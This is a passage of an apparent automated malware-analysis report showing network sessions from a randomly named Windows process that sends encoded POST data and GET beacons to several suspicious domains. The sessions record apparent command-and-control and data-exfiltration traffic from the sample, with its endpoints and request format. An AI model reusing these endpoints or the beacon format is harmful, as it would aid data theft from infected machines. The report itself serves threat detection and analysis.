                                                                  Data Raw: 33 68 3d 2f 48 72 38 65 44 6b 2f 37 4d 47 4d 48 42 57 58 6c 51 30 6e 55 47 6d 32 44 74 49 36 36 2f 43 38 45 6b 77 68 64 77 41 71 57 6d 6f 64 65 5a 79 6c 6c 73 31 59 68 33 64 44 45 71 35 6e 79 78 70 62 4c 66 6a 41 36 6a 4f 51 66 64 37 69 44 35 71 4a 31 6c 6e 52 45 31 74 79 4a 68 59 71 4f 61 39 65 6a 37 48 32 73 38 31 38 6e 4e 6d 4a 4c 4f 65 59 50 36 4f 6e 65 6d 56 6b 64 4e 48 61 30 53 47 56 39 6c 77 4e 48 53 48 77 46 45 43 4e 70 6b 66 56 53 38 49 38 46 59 69 5a 61 58 2b 34 53 35 55 42 33 30 74 36 79 53 52 66 4a 77 58 37 34 45 4a 4f 33 69 77 6d 76 65 32 61 46 70 44 2b 64 42 58 35 39 6f 7a 6a 5a 4c 5a 53 73 52 42 4b 52 58 68 42 55 4f 46 48 43 42 32 42 48 76 69 2f 2b 74 53 70 5a 79 74 54 61 43 30 45 4f 6d 46 62 50 62 32 78 6b 68 56 64 50 41 61 42 53 76 6c 59 57 4e 43 44 58 77 4c 57 4c 32 75 48 76 70 6f 65 4f 6b 72 55 39 72 42 48 59 4e 65 38 5a 69 6a 51 74 32 44 79 46 47 2f 58 57 61 47 57 4c 71 66 45 36 61 35 71 6e 46 34 75 62 7a 2f 7a 67 43 72 2b 48 32 42 68 46 73 53 77 7a 68 48 35 79 56 4a 59 4a 4b 49 [TRUNCATED]
                                                                   Data Ascii: 3h= [TRUNCATED]
                                                                   Jan 10, 2025 18:51:58.225920916 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                  date: Fri, 10 Jan 2025 17:51:57 GMT
                                                                  content-type: text/html; charset=utf-8
                                                                  content-length: 1138
                                                                  x-request-id: f56b8029-d8f5-4800-8f6b-ec0e42046467
                                                                  cache-control: no-store, max-age=0
                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                  vary: sec-ch-prefers-color-scheme
                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_c9ig55E3nT++X9XqkzNGSH2k8S0ToHdg6qJ5oT8jrxq8Ne2e+zhm7GfjDprYRlSZx62sEPtwgkZy+xaI8sW9ZQ==
                                                                  set-cookie: parking_session=f56b8029-d8f5-4800-8f6b-ec0e42046467; expires=Fri, 10 Jan 2025 18:06:58 GMT; path=/
                                                                  connection: close
                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_c9ig55E3nT++X9XqkzNGSH2k8S0ToHdg6qJ5oT8jrxq8Ne2e+zhm7GfjDprYRlSZx62sEPtwgkZy+xaI8sW9ZQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                  Jan 10, 2025 18:51:58.225967884 CET  591   IN   Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjU2YjgwMjktZDhmNS00ODAwLThmNmItZWMwZTQyMDQ2NDY3IiwicGFnZV90aW1lIjoxNzM2NTMxNT


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  12          192.168.2.4  49930        199.59.243.228  80                1780  C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe

                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                  Jan 10, 2025 18:52:00.256920099 CET  464   OUT  GET /cfcv/?3h=yFDcd28s49uqEHKqlww2Cwyic4spmP25HFlFfS4Td0kedo/+sd9J73ZTBpR3wC1xC+DY+jWyDKbAELqR1mf/RH93IVoJN7NWkPDeisF5hKGdeLzaAp6KdnI=&Ol=yN0LtN-HDTPXX HTTP/1.1
                                                                  Host: www.969-usedcar02.shop
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-us
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Jan 10, 2025 18:52:00.746696949 CET  1236  IN   HTTP/1.1 200 OK
                                                                  date: Fri, 10 Jan 2025 17:51:59 GMT
                                                                  content-type: text/html; charset=utf-8
                                                                  content-length: 1470
                                                                  x-request-id: fb41306e-6418-457b-8a35-bc8b3f9e18ed
                                                                  cache-control: no-store, max-age=0
                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                  vary: sec-ch-prefers-color-scheme
                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_xPepBT6faatcpleza/H6qqVwOvtYmu3dqKgdaXbAErsHRE04G0l9y507/DW/QdUzBRTNHMbP5Z0Bh3dZagMZ5g==
                                                                  set-cookie: parking_session=fb41306e-6418-457b-8a35-bc8b3f9e18ed; expires=Fri, 10 Jan 2025 18:07:00 GMT; path=/
                                                                  connection: close
                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_xPepBT6faatcpleza/H6qqVwOvtYmu3dqKgdaXbAErsHRE04G0l9y507/DW/QdUzBRTNHMbP5Z0Bh3dZagMZ5g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                  Jan 10, 2025 18:52:00.746747017 CET  923   IN   Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZmI0MTMwNmUtNjQxOC00NTdiLThhMzUtYmM4YjNmOWUxOGVkIiwicGFnZV90aW1lIjoxNzM2NTMxNT


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  13          192.168.2.4  49965        8.136.96.106    80                1780  C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe

                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                  Jan 10, 2025 18:52:06.223392010 CET  731   OUT  POST /b6bc/ HTTP/1.1
                                                                  Host: www.juewucangku.xyz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 199
                                                                  Connection: close
                                                                  Origin: http://www.juewucangku.xyz
                                                                  Referer: http://www.juewucangku.xyz/b6bc/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Ascii: 3h=8qp4YhFXg8NLi2gMLvv5gjnlPQ+AfFUnJITyLJagoogxkNZw60+yeR24Tlsk5GegWJ4nrAbJgCSmfffZlPY+ge+RTV0aO8qOBWt2nvAV1pmbbjIpsXupog6mza6S1VQrjvyJQDZ08GT1ibI+mbm5VFLWMttCGf44Th15OCO8t4b5h2KeND2fTPm4UHHG5eO9fw==
                                                                  Jan 10, 2025 18:52:07.165193081 CET  403   IN   HTTP/1.1 301 Moved Permanently
                                                                  Server: nginx
                                                                  Date: Fri, 10 Jan 2025 17:52:07 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 162
                                                                  Connection: close
                                                                  Location: https://www.juewucangku.xyz/b6bc/
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  14          192.168.2.4  49981        8.136.96.106    80                1780  C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe

                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                  Jan 10, 2025 18:52:08.775963068 CET  751   OUT  POST /b6bc/ HTTP/1.1
                                                                  Host: www.juewucangku.xyz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 219
                                                                  Connection: close
                                                                  Origin: http://www.juewucangku.xyz
                                                                  Referer: http://www.juewucangku.xyz/b6bc/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Ascii: 3h=8qp4YhFXg8NLwCkMMIb53TniRg+AQlUjJIfyLIewobUxltpw1ReydR24bFsh9GerWJ9SrFjJgCGmfd3Zl4M5gO+TGF0UK8qOBWt2nulw1p+baS4pt1WqhA6n566SxVRijvyRQC1S8AX1ifM+mvS6fFLQCNsWBvFdLUchER6anL/agwHEcyXIBPCLJAOy0dz0E9jb2kPF2fjz/GmLAuYN7Uc=
                                                                  Jan 10, 2025 18:52:09.706751108 CET  403   IN   HTTP/1.1 301 Moved Permanently
                                                                  Server: nginx
                                                                  Date: Fri, 10 Jan 2025 17:52:09 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 162
                                                                  Connection: close
                                                                  Location: https://www.juewucangku.xyz/b6bc/
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  15          192.168.2.4  49994        8.136.96.106    80                1780  C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe

                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                  Jan 10, 2025 18:52:11.323052883 CET  10833 OUT  POST /b6bc/ HTTP/1.1
                                                                  Host: www.juewucangku.xyz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10299
                                                                  Connection: close
                                                                  Origin: http://www.juewucangku.xyz
                                                                  Referer: http://www.juewucangku.xyz/b6bc/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Jan 10, 2025 18:52:12.233537912 CET  403   IN   HTTP/1.1 301 Moved Permanently
                                                                  Server: nginx
                                                                  Date: Fri, 10 Jan 2025 17:52:12 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 162
                                                                  Connection: close
                                                                  Location: https://www.juewucangku.xyz/b6bc/
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  16          192.168.2.4  50009        8.136.96.106    80                1780  C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe

                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                  Jan 10, 2025 18:52:13.869534969 CET  461   OUT  GET /b6bc/?3h=xoBYbUYuit1npWAzc9zxgzbhPQqmOl0jRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC4HeAxlwjpiSK9Zc7LnKUA0sm5GF01YtOiDz9nk9gyiJeQf3o0kWy0t0k=&Ol=yN0LtN-HDTPXX HTTP/1.1
                                                                  Host: www.juewucangku.xyz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-us
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Jan 10, 2025 18:52:14.811527014 CET  544   IN   HTTP/1.1 301 Moved Permanently
                                                                  Server: nginx
                                                                  Date: Fri, 10 Jan 2025 17:52:14 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 162
                                                                  Connection: close
                                                                  Location: https://www.juewucangku.xyz/b6bc/?3h=xoBYbUYuit1npWAzc9zxgzbhPQqmOl0jRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC4HeAxlwjpiSK9Zc7LnKUA0sm5GF01YtOiDz9nk9gyiJeQf3o0kWy0t0k=&Ol=yN0LtN-HDTPXX
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  17          192.168.2.4  50019        69.57.163.64    80                1780  C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe

                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                  Jan 10, 2025 18:52:19.940507889 CET  740   OUT  POST /9er8/ HTTP/1.1
                                                                  Host: www.startsomething.xyz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 199
                                                                  Connection: close
                                                                  Origin: http://www.startsomething.xyz
                                                                  Referer: http://www.startsomething.xyz/9er8/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Ascii: 3h=/2xwZle+gMwsB/vN85Eqrt+t1fsbALJWj+auEUip3i0imMlLC8FJ5hlF3aY23eQ/WDwTskqluSG4ZmMXBGgoEmZu4g8Za14r5pJlGbt2+p1UKyYyb5HRe6mZs7gYRdiTY1QrfkQfUcrvy7ztIaCvfsgFLSBs0OfVKhUonsYBZ82b5yW6JJNLZdR2gJTSgYL5Tg==
                                                                  Jan 10, 2025 18:52:20.548613071 CET  533   IN   HTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:52:20 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  18          192.168.2.4  50020        69.57.163.64    80                1780  C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe

                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                  Jan 10, 2025 18:52:22.496164083 CET  760   OUT  POST /9er8/ HTTP/1.1
                                                                  Host: www.startsomething.xyz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 219
                                                                  Connection: close
                                                                  Origin: http://www.startsomething.xyz
                                                                  Referer: http://www.startsomething.xyz/9er8/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Ascii: 3h=/2xwZle+gMwsTOfN+ewqsN+yrPsbOrJSj/muEVXu3QgihutLQoZJ6hlFuqYu5+QKWD0tslWluSS4ZjwXBWcpF2ZshQ8bXV4r5pJlGb4R+ptUJCoyZYHWQamakbgYVdifY1RMfgwlUejvy/3tIJasVshAByAS1tGNPTRdsqczY9OG80bgY4scLd1F9Oamtb2wIih1IW/j4pEevj3uAm9wKow=
                                                                  Jan 10, 2025 18:52:23.173947096 CET  533   IN   HTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:52:23 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  19 | 192.168.2.4 | 50021 | 69.57.163.64 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 10, 2025 18:52:25.045869112 CET | 10842 | OUT | POST /9er8/ HTTP/1.1
                                                                  Host: www.startsomething.xyz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10299
                                                                  Connection: close
                                                                  Origin: http://www.startsomething.xyz
                                                                  Referer: http://www.startsomething.xyz/9er8/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 2f 32 78 77 5a 6c 65 2b 67 4d 77 73 54 4f 66 4e 2b 65 77 71 73 4e 2b 79 72 50 73 62 4f 72 4a 53 6a 2f 6d 75 45 56 58 75 33 52 59 69 68 63 56 4c 43 5a 5a 4a 37 68 6c 46 6d 4b 59 36 35 2b 51 74 57 44 4d 58 73 6c 61 31 75 52 71 34 5a 46 45 58 56 31 45 70 4b 32 5a 73 38 67 38 65 61 31 34 2b 35 70 35 70 47 62 6f 52 2b 70 74 55 4a 41 77 79 65 4a 48 57 53 61 6d 5a 73 37 67 63 52 64 6a 41 59 31 34 7a 66 6d 73 31 54 71 76 76 38 2f 6e 74 62 71 2b 73 5a 73 68 4f 43 79 41 61 31 74 36 73 50 54 4d 69 73 71 42 75 59 39 71 47 78 6c 36 6a 41 70 51 65 57 63 70 2f 74 66 75 79 31 74 32 4d 42 67 38 4f 4f 57 7a 52 6e 34 55 49 30 42 50 67 52 6b 68 36 62 63 58 49 63 73 51 50 6c 64 70 77 67 75 6b 75 55 43 6c 36 44 71 52 47 76 7a 4a 38 46 6a 67 41 37 6e 6b 75 49 74 67 65 50 42 38 30 6c 31 4f 74 6d 52 6d 45 62 50 43 7a 62 41 4b 4a 39 2f 6f 42 36 48 79 42 42 6f 41 6a 5a 33 47 5a 52 47 6b 30 73 50 59 52 4e 77 73 2f 61 51 43 36 66 46 51 4b 67 33 4a 42 57 41 46 34 61 75 30 32 38 37 51 72 2b 68 4a 57 30 58 59 42 50 79 75 [TRUNCATED]
                                                                  Data Ascii: 3h= [TRUNCATED]
                                                                  Jan 10, 2025 18:52:25.680994987 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:52:25 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  20 | 192.168.2.4 | 50022 | 69.57.163.64 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 10, 2025 18:52:27.583806038 CET | 464 | OUT | GET /9er8/?3h=y0ZQaQGYytoPYKDe8bY9jaat1pADepFe7dCpW1aT2gUHtttnVaZ37Rd6tJxE+MMiCUIjuSyOnxmaU3U+fVZaaVhngwU9AnEVouJjO4g3krxQAVkSYZ/9aI0=&Ol=yN0LtN-HDTPXX HTTP/1.1
                                                                  Host: www.startsomething.xyz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-us
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Jan 10, 2025 18:52:28.272419930 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:52:28 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
